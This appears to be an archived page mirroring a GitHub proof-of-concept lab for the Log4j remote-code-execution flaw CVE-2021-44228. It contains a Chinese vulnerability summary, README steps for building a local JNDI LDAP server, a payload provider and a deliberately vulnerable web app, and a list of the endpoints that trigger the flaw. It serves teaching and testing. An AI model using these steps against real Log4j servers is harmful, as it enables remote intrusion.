Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j 代码问题漏洞

Source
https://github.com/b1tm0n3r/CVE-2021-44228
Associated Vulnerability
Title:Apache Log4j 代码问题漏洞 (CVE-2021-44228)
Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
Description
CVE-2021-44228 demo webapp
Readme
# CVE-2021-44228-POC
Yet another CVE-2021-44228 POC

Affected Log4j versions: from 2.0-beta9 up to 2.14.1

## Prerequisites 

Used Java: OpenJDK 11
 - https://jdk.java.net/archive/

Maven required to build apps in this repo (alternatively, download prepared jar files from release):
 - https://maven.apache.org/

## Building & Running the projects 

Directories description: 
 - jndi - project with JNDI LDAP Reference server
 - web - project with vulnerable server
 - provider - project with code compiler & server
 - resources - directory for additional resources (like screenshots)

Build projects with: 
```
mvn clean install
```

Run jars with:
```
java -jar <jar>
```

Files to run (these files will be generated in: <repo_name>/<project_name>/target):
 - jndi-1.0.0-jar-with-dependencies.jar (run with: java -jar jndi-1.0.0-jar-with-dependencies.jar "http://127.0.0.1:8081/#Exploit")
 - web-1.0.0.jar (run with: java -jar web-1.0.0.jar) - runs on port 8080
 - provider-1.0.0.jar (run with: java -jar provider-1.0.0.jar) - runs on port 8081

***Alternatively build and run docker image - Docker section below Screenshots***

## Basic usage

0. Start all projects (as above)
1. Go to http://127.0.0.1:8081/
2. Copy exploit template and paste it in Java Code box
3. Go to vulnerable logger at: http://127.0.0.1:8080/
4. Copy payload from example and send it to the logger
5. Calc app should open (Windows). In case of Linux and Mac, empty file named "PWNED" should be created in \/tmp directory

## Description

Currently, the vulnerability can be exploited via: 
 - */logAction* -> post endpoint (triggers with payload in request headers or "payload" param)
 - */logGetHeaders* -> get endpoint (trigger with request headers)
 - */logPut* -> put endpoint (trigger with request headers or request body)
 - */logDelete* -> delete endpoint (trigger with request headers or request body):

## Screenshots 

Java version:\
![Java version image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/javaVer.png)

Exploit preparation + Compilation + Serving class file:\
![Exploit preparation image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/provider.png)

Payload (to be delivered to log4j) preparation + Sending the payload:\
![Payload image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/web.png)

JNDI Reference:\
![JNDI Reference image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/jndiRef.png)

Exploitation result (Windows):\
![Exploitation result (win) image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/exploitation_win.png)

Exploitation result (GNU/Linux):\
![Exploitation result (lin) image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/exploitation_lin.png)

## Docker

You can also build docker image with Dockerfile located in main repo directory.
Instructions:
```
docker build . -t log4j_vuln
docker run -p 8080:8080 -p 8081:8081 log4j_vuln
```

To find CONTAINER_ID: 
```
docker ps
```

To see exploitation result (inside container):
```
docker exec -it <CONTAINER_ID> bash
ls -la /tmp
```

Kill docker container with: 
```
docker container kill <CONTAINER_ID>
```

## Disclaimer

Code presented in this repository is intended to be used **FOR EDUCATIONAL PURPOSES ONLY**.\
I do not aid, or endorse any malicious usage of data from this repository. 

Additionally, code in this repository is shared on an 'AS IS' BASIS - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND.

## More information

https://www.lunasec.io/docs/blog/log4j-zero-day/
File Snapshot

 [4.0K]  /data/pocs/2b17bc618700351d3eabe460573504f27278cca8
├── [ 729]  Dockerfile
├── [4.0K]  jndi
│   ├── [1.4K]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           └── [4.0K]  java
│               └── [4.0K]  com
│                   └── [4.0K]  jndi
│                       └── [4.0K]  serv
│                           ├── [2.7K]  LDAPServer.java
│                           └── [2.8K]  OperationInterceptor.java
├── [4.0K]  provider
│   ├── [1.3K]  pom.xml
│   └── [4.0K]  src
│       ├── [4.0K]  main
│       │   ├── [4.0K]  java
│       │   │   └── [4.0K]  com
│       │   │       └── [4.0K]  code
│       │   │           └── [4.0K]  provider
│       │   │               ├── [ 280]  BaseController.java
│       │   │               ├── [1.8K]  BaseRestController.java
│       │   │               ├── [ 422]  Compiler.java
│       │   │               ├── [1.3K]  FileService.java
│       │   │               └── [ 314]  ProviderApplication.java
│       │   └── [4.0K]  resources
│       │       ├── [  17]  application.properties
│       │       └── [4.0K]  templates
│       │           └── [1.6K]  index.html
│       └── [4.0K]  test
│           └── [4.0K]  java
│               └── [4.0K]  com
│                   └── [4.0K]  code
│                       └── [4.0K]  provider
│                           └── [ 211]  ProviderApplicationTests.java
├── [3.6K]  README.md
├── [4.0K]  resources
│   ├── [4.0K]  docker
│   │   └── [ 183]  startup.sh
│   └── [4.0K]  screenshots
│       ├── [ 21K]  exploitation_lin.png
│       ├── [148K]  exploitation_win.png
│       ├── [5.1K]  javaVer.png
│       ├── [3.8K]  jndiRef.png
│       ├── [ 59K]  provider.png
│       └── [ 13K]  web.png
└── [4.0K]  web
    ├── [1.8K]  pom.xml
    └── [4.0K]  src
        ├── [4.0K]  main
        │   ├── [4.0K]  java
        │   │   └── [4.0K]  com
        │   │       └── [4.0K]  log4shell
        │   │           └── [4.0K]  web
        │   │               ├── [ 281]  BaseController.java
        │   │               ├── [2.0K]  LogController.java
        │   │               └── [ 304]  WebApplication.java
        │   └── [4.0K]  resources
        │       ├── [   1]  application.properties
        │       └── [4.0K]  templates
        │           └── [ 945]  index.html
        └── [4.0K]  test
            └── [4.0K]  java
                └── [4.0K]  com
                    └── [4.0K]  log4shell
                        └── [4.0K]  web
                            └── [ 206]  WebApplicationTests.java

38 directories, 28 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.